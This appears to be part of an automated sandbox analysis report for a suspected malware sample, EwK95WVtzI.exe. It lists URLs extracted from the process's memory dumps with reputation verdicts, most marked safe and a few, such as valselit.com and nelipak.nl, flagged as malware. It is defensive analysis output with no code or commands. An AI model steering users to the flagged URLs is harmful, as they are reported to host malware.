                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.myropcb.com/services-capabilities/pcb-restoration/EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=LEwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://gmpg.org/xfn/11EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.cloudflare.com/5xx-error-landingEwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.myropcb.com/services-capabilities/stencil/EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.valselit.com/177-appartement-a-vendre-sigean-30378EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    unknown
                                                                                                                                                                    https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.ora-ito.com/9bEwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.myropcb.com/why-use-myro/EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.nelipak.nl/EwK95WVtzI.exe, 00000000.00000002.2785021069.00000000077E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, 